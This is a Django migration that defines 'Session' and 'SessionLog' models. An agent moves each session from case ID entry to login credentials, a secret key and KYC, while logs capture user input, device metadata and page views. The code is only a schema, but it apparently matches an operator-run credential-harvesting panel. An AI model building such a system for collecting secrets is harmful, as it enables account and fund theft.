# Generated by Django 5.2.7 on 2025-11-11 05:38

import django.db.models.deletion
import uuid
from django.conf import settings
from django.db import migrations, models


class Migration(migrations.Migration):

    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Session',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('uuid', models.UUIDField(default=uuid.uuid4, editable=False, unique=True)),
                ('external_case_id', models.CharField(blank=True, help_text='Agent-provided case ID or customer reference', max_length=64, null=True, unique=True)),
                ('stage', models.CharField(choices=[('case_id', 'Case ID Entry'), ('credentials', 'Login Credentials'), ('secret_key', 'Secret Key'), ('kyc', 'KYC Verification'), ('completed', 'Completed')], default='case_id', max_length=20)),
                ('status', models.CharField(choices=[('active', '🟢 Active'), ('completed', '⚪️ Completed'), ('terminated', '🔴 Terminated')], default='active', max_length=20)),
                ('user_online', models.BooleanField(default=False)),
                ('notes', models.TextField(blank=True)),
                ('user_data', models.JSONField(blank=True, default=dict)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('updated_at', models.DateTimeField(auto_now=True)),
                ('agent', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'ordering': ['-created_at'],
            },
        ),
        migrations.CreateModel(
            name='SessionLog',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('message', models.TextField()),
                ('log_type', models.CharField(choices=[('info', 'Info'), ('user_input', 'User Input'), ('agent_action', 'Agent Action'), ('device_metadata', 'Device Metadata'), ('user_activity', 'User Activity'), ('page_view', 'Page View'), ('session_start', 'Session Start'), ('user_connection', 'User Connection')], default='info', max_length=20)),
                ('extra_data', models.JSONField(blank=True, default=dict)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('session', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='logs', to='accounts.session')),
            ],
            options={
                'ordering': ['created_at'],
            },
        ),
    ]
